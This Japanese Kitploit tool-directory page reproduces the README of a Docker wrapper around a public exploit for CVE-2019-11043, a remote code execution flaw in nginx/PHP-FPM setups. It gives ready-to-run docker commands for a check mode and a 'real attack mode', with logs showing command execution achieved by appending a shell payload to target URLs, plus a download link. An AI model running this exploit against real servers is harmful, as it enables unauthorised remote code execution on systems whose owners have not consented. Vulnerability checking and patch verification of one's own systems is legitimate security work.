Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
docker-CVE-2019-11043 — nginx/php-fpmアプリケーションにおけるCVE-2019-11043の脆弱性を確認するためのDockerイメージとコマンド。 | Kitploit
ツール/GitHubGitHub/ypereirareis/docker-cve-2019-11043
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubypereirareis/docker-cve-2019-11043

docker-CVE-2019-11043

nginx/php-fpmアプリケーションにおけるCVE-2019-11043の脆弱性を確認するためのDockerイメージとコマンド。

リポジトリを見る
8216年前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-11043 を確認するためのDockerイメージとコマンド

Build Status

  • CVE: CVE-2019-11043
  • 説明: PHP 7.1.x(7.1.33未満)、7.2.x(7.2.24未満)、7.3.x(7.3.11未満)の特定のFPMセットアップ構成では、FPMモジュールが割り当てられたバッファを超えてFCGIプロトコルデータ用に予約された領域に書き込む可能性があり、リモートコード実行の可能性が生じます。
  • 詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-11043
  • Github エクスプロイト: https://github.com/neex/phuip-fpizdam

ヘルプ

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h

WebサイトまたはURLの確認

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php

脆弱性がある場合の結果例:

https://github.com/neex/phuip-fpizdam#playground-environment

チェックモードのみ

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it

実際の攻撃モード

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php 
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!

エクスプロイト

脆弱性がない場合の結果例:

root@kitploit:~
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong

Dockerイメージのビルド

root@kitploit:~
docker build -t ypereirareis/cve-2019-11043 .
ツールをダウンロード